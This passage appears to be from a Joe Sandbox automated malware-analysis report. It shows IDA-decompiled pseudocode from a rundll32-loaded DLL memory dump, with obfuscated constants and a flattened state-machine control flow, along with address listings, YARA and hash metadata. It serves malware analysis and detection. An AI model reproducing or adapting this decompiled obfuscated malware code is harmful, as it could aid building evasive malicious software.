				_v40 = _v40 / _t389;
				_v40 = _v40 ^ 0x00002ddd;
				_v140 = 0xf458;
				_v140 = _v140 + 0x660b;
				_v140 = _v140 << 0xd;
				_t390 = 0x3b;
				_v140 = _v140 / _t390;
				_v140 = _v140 ^ 0x00bbd1d1;
				_v84 = 0x2cf9;
				_v84 = _v84 ^ 0xe2cb4fb4;
				_v84 = _v84 | 0x3d81796a;
				_v84 = _v84 ^ 0xffcb5ef8;
				_v156 = 0xe047;
				_v156 = _v156 + 0xec23;
				_v156 = _v156 | 0xc96a13e4;
				_v156 = _v156 ^ 0x1a962ea6;
				_v156 = _v156 ^ 0xd3fdba9b;
				_v108 = 0x4236;
				_v108 = _v108 >> 8;
				_v108 = _v108 + 0xffff4e26;
				_v108 = _v108 ^ 0xffff2512;
				_v24 = 0xcb45;
				_t391 = 0x77;
				_v24 = _v24 * 0xf;
				_v24 = _v24 ^ 0x000bb0ab;
				_v100 = 0xb258;
				_v100 = _v100 * 0x6b;
				_v100 = _v100 / _t391;
				_v100 = _v100 ^ 0x0000cac4;
				_v16 = 0xab6c;
				_v16 = _v16 + 0x630c;
				_v16 = _v16 ^ 0x0001587e;
				_v20 = 0xcdcd;
				_v20 = _v20 + 0xffff01ab;
				_v20 = _v20 ^ 0xfffff9e5;
				_v60 = 0xefa6;
				_t392 = 0x4c;
				_v60 = _v60 * 0x26;
				_v60 = _v60 ^ 0x0023a95c;
				_v112 = 0x9292;
				_v112 = _v112 + 0xffff5686;
				_v112 = _v112 / _t392;
				_v112 = _v112 ^ 0x035e352f;
				_v96 = 0x9b3d;
				_v96 = _v96 + 0xb399;
				_v96 = _v96 + 0xffffc9ce;
				_v96 = _v96 ^ 0x000113bb;
				_v152 = 0x851e;
				_v152 = _v152 + 0x4a3f;
				_v152 = _v152 | 0x2010aaec;
				_t393 = 0xa;
				_v152 = _v152 * 0x5f;
				_v152 = _v152 ^ 0xe64968ad;
				_v124 = 0x3cc7;
				_v124 = _v124 << 0xe;
				_v124 = _v124 + 0x9bc0;
				_v124 = _v124 ^ 0x0f321da8;
				_v116 = 0xd63e;
				_v116 = _v116 + 0x90bc;
				_v116 = _v116 * 0x13;
				_v116 = _v116 ^ 0x001aea95;
				_v32 = 0xbd6a;
				_v32 = _v32 | 0xd1e4c041;
				_v32 = _v32 ^ 0xd1e4a4ec;
				_v88 = 0xac52;
				_v88 = _v88 | 0x10312b45;
				_v88 = _v88 * 0x50;
				_v88 = _v88 ^ 0x0f86db5e;
				_v52 = 0xe981;
				_v52 = _v52 | 0xae117bb0;
				_v52 = _v52 ^ 0xae11932c;
				_v144 = 0x1dfb;
				_v144 = _v144 | 0x48b114e1;
				_v144 = _v144 + 0xfffff9cd;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x0916476d;
				_v56 = 0xf206;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00005f8d;
				_v92 = 0xe052;
				_v92 = _v92 + 0x2471;
				_v92 = _v92 + 0xffffdbed;
				_v92 = _v92 ^ 0x0000938e;
				_v68 = 0xe0f9;
				_v68 = _v68 * 0x31;
				_v68 = _v68 + 0xffff857e;
				_v68 = _v68 ^ 0x002a9bd7;
				_v48 = 0x94fa;
				_v48 = _v48 / _t393;
				_v48 = _v48 ^ 0x00004295;
				_v132 = 0xaea7;
				_v132 = _v132 | 0xc9193032;
				_v132 = _v132 ^ 0x9bfcaca0;
				_v132 = _v132 + 0xffff6354;
				_v132 = _v132 ^ 0x52e462fc;
				_v76 = 0xa7e3;
				_v76 = _v76 | 0xf0f94981;
				_v76 = _v76 + 0xffff9c41;
				_v76 = _v76 ^ 0xf0f9e006;
				_v164 = 0x36ff;
				_v164 = _v164 + 0xffff2d0d;
				_v164 = _v164 + 0x7fd2;
				_t394 = 0x7d;
				_v164 = _v164 * 0x77;
				_v164 = _v164 ^ 0xfff2f01d;
				_v120 = 0xc712;
				_v120 = _v120 | 0x5aa592ba;
				_v120 = _v120 + 0x46e1;
				_v120 = _v120 ^ 0x5aa67fba;
				_v28 = 0x86a8;
				_t395 = _v136;
				_v28 = _v28 / _t394;
				_v28 = _v28 ^ 0x0000629f;
				_v36 = 0xa6d4;
				_v36 = _v36 + 0xffffc65c;
				_v36 = _v36 ^ 0x00006d44;
				_v72 = 0x4693;
				_v72 = _v72 | 0x8261f221;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x0104c1d4;
				_v104 = 0x1547;
				_v104 = _v104 >> 9;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x0000044d;
				_v148 = 0xcfb0;
				_v148 = _v148 >> 6;
				_v148 = _v148 | 0xbecf16fe;
				_v148 = _v148 ^ 0xbecf17ff;
				_v64 = 0x449d;
				_v64 = _v64 << 0xd;
				_v64 = _v64 * 0x30;
				_v64 = _v64 ^ 0x9bae0001;
				_t430 = _v12;
				while(1) {
					L1:
					_t364 = _v128;
					while(1) {
						_t422 = 0x1994d475;
						while(1) {
							L3:
							_t443 = _t433 - _t422;
							if(_t443 > 0) {
								goto L20;
							}
							L4:
							if(_t443 == 0) {
								E10015963(_a16, _v148, _t438, _v92, _v68);
								_t440 =  &(_t440[3]);
								goto L19;
							} else {
								if(_t433 == 0x18ba6df) {
									_t430 = _t430 + 0x2c;
									asm("sbb esi, esi");
									_t433 = (_t433 & 0x01739b49) + 0x4550e01;
									continue;
								} else {
									if(_t433 == 0x2f8e7bf) {
										_t377 = E10012249(_a12, _v40, _t395, _t395, _v140, _v84, _v156, _v108, _t386, _t395, _t395, _v24, _t395,  &_v12, _t395,  &_v8);
										_t440 =  &(_t440[0xe]);
										if(_t377 == 0) {
											L19:
											_t433 = 0x4550e01;
											goto L13;
										} else {
											_t380 = E10017B6B();
											_t433 = 0x5c8a94a;
											_t364 = _v12 * 0x2c + _t386;
											_v128 = _t364;
											_t430 =  >=  ? _t386 : (_t380 & 0x0000001f) * 0x2c + _t386;
											goto L14;
										}
										L33:
										return _t364;
									} else {
										if(_t433 == 0x4550e01) {
											_t296 =  &_v48; // 0x6d44
											E100091CD( *_t296, _v132, _v76, _t438, _v164);
											_t440 =  &(_t440[3]);
											_t433 = 0x2fd49dd4;
											L13:
											_t364 = _v128;
											L14:
											_t395 = _v136;
											_t422 = 0x1994d475;
											continue;
										} else {
											if(_t433 == 0x5c8a94a) {
												_t395 = E10017C1D(_v20, _v60, _a12,  *_t430, _v64, _v112);
												_t440 =  &(_t440[4]);
												_v136 = _t395;
												_t433 =  !=  ? 0x2d7fc8f5 : 0x18ba6df;
												goto L1;
											} else {
												if(_t433 == 0x16bff9b6) {
													_t433 = 0x1a134602;
													while(1) {
														L3:
														_t443 = _t433 - _t422;
														if(_t443 > 0) {
															goto L20;
														}
														goto L4;
													}
													goto L20;
												}
											}
										}
									}
								}
							}
							L30:
							if(_t433 != 0x399cbc9a) {
								_t364 = _v128;
								_t395 = _v136;
								continue;
							}
							goto L33;
							L20:
							if(_t433 == 0x1a134602) {
								_push(_t395);
								_t364 = E100157E8(0x20000);
								_t386 = _t364;
								if(_t386 == 0) {
									_t433 = 0x399cbc9a;
									goto L29;
								} else {
									_t433 = 0x34bb9491;
									goto L13;
								}
							} else {
								_t364 = 0x2d7fc8f5;
								if(_t433 == 0x2d7fc8f5) {
									E1001ECE3( &_v4, _v96, _v104, _v152, _t438, _v124, _t395, _t395, _v116, _v32);
									_t433 =  !=  ? 0x1994d475 : 0x18ba6df;
									_t364 = E1001F23C(_v88, _v136, _v52, _v144, _v56);
									_t440 =  &(_t440[0xb]);
									L29:
									_t422 = 0x1994d475;
								} else {
									if(_t433 == 0x2fd49dd4) {
										return E100091CD(_v120, _v28, _v36, _t386, _v72);
									}
									if(_t433 == 0x34bb9491) {
										_push(_t395);
										_t438 = E100157E8(0x2000);
										_t433 =  !=  ? 0x2f8e7bf : 0x2fd49dd4;
										goto L13;
									}
								}
							}
							goto L30;
						}
					}
				}
			}
































































                                                                        0x10006214
                                                                        0x1000621b
                                                                        0x10006222
                                                                        0x10006229
                                                                        0x10006230
                                                                        0x10006231
                                                                        0x10006232
                                                                        0x10006237
                                                                        0x10006242
                                                                        0x1000624b
                                                                        0x1000624d
                                                                        0x10006252
                                                                        0x10006256
                                                                        0x1000625b
                                                                        0x10006261
                                                                        0x10006269
                                                                        0x10006271
                                                                        0x1000627c
                                                                        0x10006283
                                                                        0x1000628e
                                                                        0x10006296
                                                                        0x1000629b
                                                                        0x100062a0
                                                                        0x100062a5
                                                                        0x100062ad
                                                                        0x100062b5
                                                                        0x100062bd
                                                                        0x100062c2
                                                                        0x100062ca
                                                                        0x100062d2
                                                                        0x100062e4
                                                                        0x100062e9
                                                                        0x100062f2
                                                                        0x100062fd
                                                                        0x10006305
                                                                        0x1000630d
                                                                        0x10006316
                                                                        0x1000631b
                                                                        0x10006321
                                                                        0x10006329
                                                                        0x10006331
                                                                        0x10006339
                                                                        0x10006341
                                                                        0x10006349
                                                                        0x10006351
                                                                        0x10006359
                                                                        0x10006361
                                                                        0x10006369
                                                                        0x10006371
                                                                        0x10006379
                                                                        0x1000637e
                                                                        0x10006386
                                                                        0x1000638e
                                                                        0x100063a1
                                                                        0x100063a2
                                                                        0x100063a9
                                                                        0x100063b4
                                                                        0x100063c1
                                                                        0x100063cb
                                                                        0x100063cf
                                                                        0x100063d9
                                                                        0x100063e4
                                                                        0x100063ef
                                                                        0x100063fa
                                                                        0x10006405
                                                                        0x10006410
                                                                        0x1000641b
                                                                        0x1000642a
                                                                        0x1000642d
                                                                        0x10006434
                                                                        0x1000643f
                                                                        0x10006447
                                                                        0x10006457
                                                                        0x1000645b
                                                                        0x10006463
                                                                        0x1000646b
                                                                        0x10006473
                                                                        0x1000647b
                                                                        0x10006483
                                                                        0x1000648b
                                                                        0x10006493
                                                                        0x100064a0
                                                                        0x100064a1
                                                                        0x100064a5
                                                                        0x100064ad
                                                                        0x100064b5
                                                                        0x100064ba
                                                                        0x100064c2
                                                                        0x100064ca
                                                                        0x100064d2
                                                                        0x100064df
                                                                        0x100064e3
                                                                        0x100064eb
                                                                        0x100064f6
                                                                        0x10006501
                                                                        0x1000650c
                                                                        0x10006514
                                                                        0x10006521
                                                                        0x10006525
                                                                        0x1000652d
                                                                        0x10006538
                                                                        0x10006543
                                                                        0x1000654e
                                                                        0x10006556
                                                                        0x1000655e
                                                                        0x10006566
                                                                        0x1000656b
                                                                        0x10006573
                                                                        0x1000657e
                                                                        0x10006586
                                                                        0x10006591
                                                                        0x10006599
                                                                        0x100065a1
                                                                        0x100065a9
                                                                        0x100065b1
                                                                        0x100065be
                                                                        0x100065c2
                                                                        0x100065ca
                                                                        0x100065d2
                                                                        0x100065e6
                                                                        0x100065ed
                                                                        0x100065f8
                                                                        0x10006600
                                                                        0x10006608
                                                                        0x10006610
                                                                        0x10006618
                                                                        0x10006620
                                                                        0x10006628
                                                                        0x10006632
                                                                        0x1000663a
                                                                        0x10006642
                                                                        0x1000664a
                                                                        0x10006652
                                                                        0x10006661
                                                                        0x10006662
                                                                        0x10006666
                                                                        0x1000666e
                                                                        0x10006676
                                                                        0x1000667e
                                                                        0x10006686
                                                                        0x1000668e
                                                                        0x100066a2
                                                                        0x100066a6
                                                                        0x100066ad
                                                                        0x100066b8
                                                                        0x100066c3
                                                                        0x100066ce
                                                                        0x100066d9
                                                                        0x100066e1
                                                                        0x100066e9
                                                                        0x100066ee
                                                                        0x100066f6
                                                                        0x100066fe
                                                                        0x10006708
                                                                        0x1000670c
                                                                        0x10006714
                                                                        0x1000671c
                                                                        0x10006721
                                                                        0x10006729
                                                                        0x10006731
                                                                        0x10006739
                                                                        0x10006743
                                                                        0x10006747
                                                                        0x1000674f
                                                                        0x10006756
                                                                        0x10006756
                                                                        0x10006756
                                                                        0x1000675a
                                                                        0x1000675a
                                                                        0x1000675f
                                                                        0x1000675f
                                                                        0x1000675f
                                                                        0x10006761
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006767
                                                                        0x10006767
                                                                        0x100068c3
                                                                        0x100068c8
                                                                        0x00000000
                                                                        0x1000676d
                                                                        0x10006773
                                                                        0x10006897
                                                                        0x1000689c
                                                                        0x100068a4
                                                                        0x00000000
                                                                        0x10006779
                                                                        0x1000677f
                                                                        0x10006856
                                                                        0x1000685b
                                                                        0x10006860
                                                                        0x100068cb
                                                                        0x100068cb
                                                                        0x00000000
                                                                        0x10006862
                                                                        0x1000686d
                                                                        0x10006875
                                                                        0x10006887
                                                                        0x1000688b
                                                                        0x1000688f
                                                                        0x00000000
                                                                        0x1000688f
                                                                        0x100069fb
                                                                        0x100069fb
                                                                        0x10006785
                                                                        0x1000678b
                                                                        0x100067f6
                                                                        0x100067fd
                                                                        0x10006802
                                                                        0x10006805
                                                                        0x1000680a
                                                                        0x1000680a
                                                                        0x1000680e
                                                                        0x1000680e
                                                                        0x1000675a
                                                                        0x00000000
                                                                        0x1000678d
                                                                        0x10006793
                                                                        0x100067cc
                                                                        0x100067ce
                                                                        0x100067d3
                                                                        0x100067e1
                                                                        0x00000000
                                                                        0x10006795
                                                                        0x1000679b
                                                                        0x100067a1
                                                                        0x1000675f
                                                                        0x1000675f
                                                                        0x1000675f
                                                                        0x10006761
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006761
                                                                        0x00000000
                                                                        0x1000675f
                                                                        0x1000679b
                                                                        0x10006793
                                                                        0x1000678b
                                                                        0x1000677f
                                                                        0x10006773
                                                                        0x100069bd
                                                                        0x100069c3
                                                                        0x100069c5
                                                                        0x100069c9
                                                                        0x00000000
                                                                        0x100069c9
                                                                        0x00000000
                                                                        0x100068d5
                                                                        0x100068db
                                                                        0x10006997
                                                                        0x1000699d
                                                                        0x100069a2
                                                                        0x100069a7
                                                                        0x100069b3
                                                                        0x00000000
                                                                        0x100069a9
                                                                        0x100069a9
                                                                        0x00000000
                                                                        0x100069a9
                                                                        0x100068e1
                                                                        0x100068e1
                                                                        0x100068e8
                                                                        0x10006951
                                                                        0x1000697f
                                                                        0x10006982
                                                                        0x10006987
                                                                        0x100069b8
                                                                        0x100069b8
                                                                        0x100068ea
                                                                        0x100068f0
                                                                        0x00000000
                                                                        0x100069ee
                                                                        0x100068fc
                                                                        0x1000690a
                                                                        0x10006915
                                                                        0x10006924
                                                                        0x00000000
                                                                        0x10006924
                                                                        0x100068fc
                                                                        0x100068e8
                                                                        0x00000000
                                                                        0x100068db
                                                                        0x1000675f
                                                                        0x1000675a

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #$6B$?J$Dmw$RESCDIR$q$$rYym$F
                                                                        • API String ID: 0-1064706702
                                                                        • Opcode ID: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
                                                                        • Instruction ID: 12a8db86310814296b6cd3691f3c08f104cbabb9bff823363e51c79446ee3229
                                                                        • Opcode Fuzzy Hash: dfc4d2b2e54516939d1a7f582ef6859113f7f42e62d469bc69eaab2396b0028c
                                                                        • Instruction Fuzzy Hash: 531235729083809FE368CF24C985A4FBBE2FBC5754F108A1DE5D9962A0D7B59908CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10002DEE, Relevance: 10.3, Strings: 8, Instructions: 299COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E10002DEE(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				unsigned int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				intOrPtr _t312;
				intOrPtr _t315;
				signed int _t317;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				void* _t340;
				signed int _t376;
				void* _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int* _t385;

				_t385 =  &_v1676;
				_v1652 = 0xab2a;
				_v1652 = _v1652 + 0xffff495e;
				_v1652 = _v1652 << 6;
				_v1652 = _v1652 * 0x69;
				_t384 = __edx;
				_v1652 = _v1652 ^ 0xfed2f229;
				_v1584 = 0x9d53;
				_t328 = __ecx;
				_v1584 = _v1584 + 0xa330;
				_t377 = 0xee39a7c;
				_v1584 = _v1584 ^ 0x000172e7;
				_v1592 = 0xcdb9;
				_t330 = 0x11;
				_v1592 = _v1592 * 0x36;
				_v1592 = _v1592 ^ 0x002b5ef0;
				_v1576 = 0x10e6;
				_v1576 = _v1576 ^ 0xbdc8c8ad;
				_v1576 = _v1576 ^ 0xbdc8e062;
				_v1616 = 0x2d0;
				_v1616 = _v1616 << 2;
				_v1616 = _v1616 >> 4;
				_v1616 = _v1616 ^ 0x00001000;
				_v1564 = 0x56a7;
				_v1564 = _v1564 / _t330;
				_v1564 = _v1564 ^ 0x000075e6;
				_v1668 = 0x8a0a;
				_v1668 = _v1668 ^ 0xf9b8a5a3;
				_v1668 = _v1668 >> 4;
				_v1668 = _v1668 << 8;
				_v1668 = _v1668 ^ 0x9b82d072;
				_v1608 = 0x1b3c;
				_v1608 = _v1608 << 3;
				_t331 = 0x19;
				_v1608 = _v1608 * 0x7b;
				_v1608 = _v1608 ^ 0x006884bb;
				_v1660 = 0x34f3;
				_v1660 = _v1660 ^ 0x817c71db;
				_v1660 = _v1660 << 0xc;
				_v1660 = _v1660 + 0xee26;
				_v1660 = _v1660 ^ 0xc4532971;
				_v1636 = 0xf8a9;
				_v1636 = _v1636 | 0xff2fbebc;
				_v1636 = _v1636 * 9;
				_v1636 = _v1636 ^ 0xf8afb852;
				_v1620 = 0xbdfe;
				_v1620 = _v1620 / _t331;
				_v1620 = _v1620 + 0xcd35;
				_v1620 = _v1620 ^ 0x0000b0b7;
				_v1612 = 0xc643;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 + 0xffff2544;
				_v1612 = _v1612 ^ 0xffff1dfd;
				_v1596 = 0xa7ff;
				_v1596 = _v1596 + 0xffffdda0;
				_v1596 = _v1596 ^ 0x0000ce4c;
				_v1588 = 0x97f4;
				_v1588 = _v1588 >> 0xb;
				_v1588 = _v1588 ^ 0x00000d4c;
				_v1624 = 0xc45e;
				_t332 = 0x3c;
				_v1624 = _v1624 / _t332;
				_v1624 = _v1624 ^ 0xe4d01b6a;
				_v1624 = _v1624 ^ 0xe4d071e7;
				_v1628 = 0x92d6;
				_v1628 = _v1628 >> 2;
				_v1628 = _v1628 | 0xb4e3a315;
				_v1628 = _v1628 ^ 0xb4e38f21;
				_v1676 = 0x6ce6;
				_t333 = 0x62;
				_v1676 = _v1676 / _t333;
				_t334 = 0x5b;
				_v1676 = _v1676 * 0xb;
				_v1676 = _v1676 + 0xffffdd0c;
				_v1676 = _v1676 ^ 0xffff8d43;
				_v1568 = 0x788f;
				_v1568 = _v1568 | 0x01d52ab2;
				_v1568 = _v1568 ^ 0x01d55070;
				_v1580 = 0xac01;
				_v1580 = _v1580 | 0x939dc85b;
				_v1580 = _v1580 ^ 0x939d96e7;
				_v1644 = 0x4f10;
				_v1644 = _v1644 * 0x6c;
				_v1644 = _v1644 | 0x48f07e2e;
				_v1644 = _v1644 >> 9;
				_v1644 = _v1644 ^ 0x00245a10;
				_v1656 = 0xfccd;
				_v1656 = _v1656 ^ 0x0dc9b737;
				_v1656 = _v1656 << 8;
				_v1656 = _v1656 | 0x5beff8b5;
				_v1656 = _v1656 ^ 0xdbefe6c8;
				_v1572 = 0x60e1;
				_v1572 = _v1572 / _t334;
				_v1572 = _v1572 ^ 0x000055cd;
				_v1604 = 0x4c8;
				_t335 = 0x33;
				_v1604 = _v1604 / _t335;
				_v1604 = _v1604 ^ 0x56d62181;
				_v1604 = _v1604 ^ 0x56d60377;
				_v1664 = 0xeba7;
				_t336 = 0x75;
				_v1664 = _v1664 / _t336;
				_v1664 = _v1664 + 0x2263;
				_t337 = 0x6a;
				_v1664 = _v1664 / _t337;
				_v1664 = _v1664 ^ 0x00006206;
				_v1672 = 0xe4de;
				_v1672 = _v1672 * 6;
				_v1672 = _v1672 ^ 0xd03d2876;
				_v1672 = _v1672 ^ 0x484383cd;
				_v1672 = _v1672 ^ 0x987bff54;
				_v1632 = 0x7003;
				_v1632 = _v1632 >> 0xf;
				_v1632 = _v1632 ^ 0x6ec815ff;
				_v1632 = _v1632 + 0xffffbce8;
				_v1632 = _v1632 ^ 0x6ec7acef;
				_v1640 = 0x9135;
				_v1640 = _v1640 ^ 0x0aba72c7;
				_v1640 = _v1640 | 0xda9e3ffa;
				_t338 = 7;
				_v1640 = _v1640 / _t338;
				_v1640 = _v1640 ^ 0x1f3ffeda;
				_v1648 = 0xbacf;
				_v1648 = _v1648 >> 0xd;
				_t339 = 0x17;
				_v1648 = _v1648 / _t339;
				_v1648 = _v1648 << 0xc;
				_v1648 = _v1648 ^ 0x0000584d;
				_v1600 = 0xeac1;
				_v1600 = _v1600 * 0x77;
				_v1600 = _v1600 ^ 0x006d5ca6;
				_t376 = _v1600;
				while(_t377 != 0x5fcbc3f) {
					if(_t377 != 0xee39a7c) {
						if(_t377 == 0x11ea9c68) {
							_push( &_v520);
							_t317 = E10002628(_t328, _t384);
							asm("sbb esi, esi");
							_t339 = 0x100012f8;
							_t380 =  ~_t317 & 0x1fda4e6f;
							goto L7;
						} else {
							if(_t377 == 0x1790ebe1) {
								return E100091CD(_v1632, _v1640, _v1648, _t376, _v1600);
							}
							_t394 = _t377 - 0x376b3a50;
							if(_t377 != 0x376b3a50) {
								L12:
								__eflags = _t377 - 0x7fc7711;
								if(_t377 != 0x7fc7711) {
									continue;
								} else {
									return _t317;
								}
								L16:
							} else {
								_push(_t339);
								E10001D54(_v1576, _t339, _v1616, _v1564, _v1668,  &_v1560, _v1608, _v1652);
								_push(0x10001368);
								_push(_v1620);
								E100163BF(E1001BF25(_v1660, _v1636, _t394), _t394, _v1596, _v1588,  &_v1040, _v1660, _v1624,  &_v1560,  &_v520, _v1628);
								E1001C5F7(_v1676, _v1568, _v1580, _v1644, _t321);
								_push(_v1672);
								_push(0);
								_push( &_v1040);
								_push(0);
								_push(_v1664);
								_push(_v1604);
								_push(0);
								_push(0);
								_t339 = _v1656;
								_t317 = E100189F6(_t339, _v1572, _t394);
								_t385 =  &(_t385[0x1d]);
								asm("sbb esi, esi");
								_t380 =  ~_t317 & 0xee6bd05e;
								L7:
								_t377 = _t380 + 0x1790ebe1;
								continue;
							}
						}
					}
					_t340 = 0x24;
					_t315 = E100157E8(_t340);
					_t376 = _t315;
					_t339 = _t339;
					__eflags = _t376;
					if(_t376 != 0) {
						_t377 = 0x11ea9c68;
						continue;
					}
					return _t315;
					goto L16;
				}
				 *((intOrPtr*)(_t376 + 0x20)) = _t328;
				_t377 = 0x7fc7711;
				_t312 =  *0x10021400; // 0x0
				 *((intOrPtr*)(_t376 + 0x10)) = _t312;
				 *0x10021400 = _t376;
				goto L12;
			}























































                                                                        0x10002dee
                                                                        0x10002df4
                                                                        0x10002dfc
                                                                        0x10002e04
                                                                        0x10002e12
                                                                        0x10002e16
                                                                        0x10002e18
                                                                        0x10002e22
                                                                        0x10002e2a
                                                                        0x10002e2c
                                                                        0x10002e34
                                                                        0x10002e39
                                                                        0x10002e41
                                                                        0x10002e50
                                                                        0x10002e53
                                                                        0x10002e57
                                                                        0x10002e5f
                                                                        0x10002e67
                                                                        0x10002e6f
                                                                        0x10002e77
                                                                        0x10002e7f
                                                                        0x10002e84
                                                                        0x10002e89
                                                                        0x10002e91
                                                                        0x10002ea7
                                                                        0x10002eae
                                                                        0x10002eb9
                                                                        0x10002ec1
                                                                        0x10002ec9
                                                                        0x10002ece
                                                                        0x10002ed3
                                                                        0x10002edb
                                                                        0x10002ee3
                                                                        0x10002eed
                                                                        0x10002ef0
                                                                        0x10002ef4
                                                                        0x10002efc
                                                                        0x10002f04
                                                                        0x10002f0c
                                                                        0x10002f11
                                                                        0x10002f19
                                                                        0x10002f21
                                                                        0x10002f29
                                                                        0x10002f36
                                                                        0x10002f3a
                                                                        0x10002f42
                                                                        0x10002f52
                                                                        0x10002f56
                                                                        0x10002f5e
                                                                        0x10002f66
                                                                        0x10002f6e
                                                                        0x10002f73
                                                                        0x10002f7b
                                                                        0x10002f83
                                                                        0x10002f8b
                                                                        0x10002f93
                                                                        0x10002f9b
                                                                        0x10002fa3
                                                                        0x10002fa8
                                                                        0x10002fb0
                                                                        0x10002fbc
                                                                        0x10002fbf
                                                                        0x10002fc3
                                                                        0x10002fcd
                                                                        0x10002fd5
                                                                        0x10002fdd
                                                                        0x10002fe2
                                                                        0x10002fea
                                                                        0x10002ff2
                                                                        0x10003000
                                                                        0x10003005
                                                                        0x10003010
                                                                        0x10003013
                                                                        0x10003017
                                                                        0x1000301f
                                                                        0x10003027
                                                                        0x10003032
                                                                        0x1000303d
                                                                        0x10003048
                                                                        0x10003050
                                                                        0x10003058
                                                                        0x10003060
                                                                        0x1000306d
                                                                        0x10003071
                                                                        0x10003079
                                                                        0x1000307e
                                                                        0x10003086
                                                                        0x1000308e
                                                                        0x10003096
                                                                        0x1000309b
                                                                        0x100030a3
                                                                        0x100030ab
                                                                        0x100030bb
                                                                        0x100030bf
                                                                        0x100030c7
                                                                        0x100030d3
                                                                        0x100030d8
                                                                        0x100030de
                                                                        0x100030e6
                                                                        0x100030ee
                                                                        0x100030fa
                                                                        0x100030ff
                                                                        0x10003105
                                                                        0x10003111
                                                                        0x10003114
                                                                        0x10003118
                                                                        0x10003120
                                                                        0x1000312d
                                                                        0x10003131
                                                                        0x10003139
                                                                        0x10003141
                                                                        0x10003149
                                                                        0x10003151
                                                                        0x10003156
                                                                        0x1000315e
                                                                        0x10003166
                                                                        0x1000316e
                                                                        0x10003176
                                                                        0x1000317e
                                                                        0x1000318e
                                                                        0x10003193
                                                                        0x10003199
                                                                        0x100031a1
                                                                        0x100031a9
                                                                        0x100031b2
                                                                        0x100031b5
                                                                        0x100031b9
                                                                        0x100031be
                                                                        0x100031c6
                                                                        0x100031d3
                                                                        0x100031d7
                                                                        0x100031df
                                                                        0x100031e3
                                                                        0x100031f5
                                                                        0x10003201
                                                                        0x1000330a
                                                                        0x10003312
                                                                        0x1000331c
                                                                        0x1000331e
                                                                        0x1000331f
                                                                        0x00000000
                                                                        0x10003207
                                                                        0x1000320d
                                                                        0x00000000
                                                                        0x10003383
                                                                        0x10003213
                                                                        0x10003219
                                                                        0x1000335f
                                                                        0x1000335f
                                                                        0x10003365
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000321f
                                                                        0x1000321f
                                                                        0x10003247
                                                                        0x1000324c
                                                                        0x10003251
                                                                        0x10003299
                                                                        0x100032b5
                                                                        0x100032c6
                                                                        0x100032ca
                                                                        0x100032cb
                                                                        0x100032cc
                                                                        0x100032cd
                                                                        0x100032d1
                                                                        0x100032dc
                                                                        0x100032dd
                                                                        0x100032de
                                                                        0x100032e2
                                                                        0x100032e7
                                                                        0x100032ee
                                                                        0x100032f0
                                                                        0x100032f6
                                                                        0x100032f6
                                                                        0x00000000
                                                                        0x100032f6
                                                                        0x10003219
                                                                        0x10003201
                                                                        0x10003332
                                                                        0x10003333
                                                                        0x10003338
                                                                        0x1000333a
                                                                        0x1000333b
                                                                        0x1000333d
                                                                        0x1000333f
                                                                        0x00000000
                                                                        0x1000333f
                                                                        0x10003390
                                                                        0x00000000
                                                                        0x10003390
                                                                        0x10003349
                                                                        0x1000334c
                                                                        0x10003351
                                                                        0x10003356
                                                                        0x10003359
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &$L$MX$P:k7$c"$`$l$u
                                                                        • API String ID: 0-1688440420
                                                                        • Opcode ID: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
                                                                        • Instruction ID: 244f6f35476485b824b653b9f0eb5f1c04093fde2945297bf2edbc57fc600e94
                                                                        • Opcode Fuzzy Hash: c57c8c132fb062cf0c2aaeef19711f7a283d97605f9d3aa3c5ec5f660990e958
                                                                        • Instruction Fuzzy Hash: 4CE131725083409FE368CF25C98A94BFBF1FBC4748F10891DF5A58A260D7B69909CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

